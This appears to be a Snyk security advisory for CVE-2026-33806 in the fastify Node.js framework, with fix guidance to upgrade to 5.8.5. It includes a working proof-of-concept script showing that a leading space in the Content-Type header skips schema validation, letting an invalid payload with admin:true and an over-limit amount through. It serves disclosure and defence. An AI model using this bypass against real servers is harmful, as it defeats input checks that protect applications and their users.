Improper Validation of Specified Type of Input Affecting fastify package, versions >=4.29.0 <5.8.5
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-FASTIFY-16066793
- published15 Apr 2026
- disclosed15 Apr 2026
- creditJulien Champoux
Introduced: 15 Apr 2026
NewCVE-2026-33806 (opens in a new tab)How to fix?
Upgrade fastify to version 5.8.5 or higher.
Overview
fastify is an overhead web framework, for Node.js.
Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input via the schema.body.content when a space is prepended to the Content-Type header. An attacker can bypass input validation by sending requests with a leading space in the Content-Type header, causing the body to be parsed but skipping schema validation.
Note: Even though the vulnerability was fixed in version 5.3.2, that version introduced a regression, and a new vulnerability was caused by the fix (CVE-2026-33806). To be fully protected from both the original issue, recommand to upgrade to v5.8.5.
PoC
const fastify = require('fastify')({ logger: false });
fastify.post('/transfer', {
schema: {
body: {
content: {
'application/json': {
schema: {
type: 'object',
required: ['amount', 'recipient'],
properties: {
amount: { type: 'number', maximum: 1000 },
recipient: { type: 'string', maxLength: 50 },
admin: { type: 'boolean', enum: [false] }
},
additionalProperties: false
}
}
}
}
}
}, async (request) => {
return { processed: true, data: request.body };
});
(async () => {
await fastify.ready();
// BLOCKED — normal request with invalid payload
const res1 = await fastify.inject({
method: 'POST',
url: '/transfer',
headers: { 'content-type': 'application/json' },
payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
});
console.log('Normal:', res1.statusCode);
// → 400 FST_ERR_VALIDATION
// BYPASS — single leading space
const res2 = await fastify.inject({
method: 'POST',
url: '/transfer',
headers: { 'content-type': ' application/json' },
payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
});
console.log('Leading space:', res2.statusCode);
// → 200 (validation bypassed!)
console.log('Body:', res2.body);
await fastify.close();
})();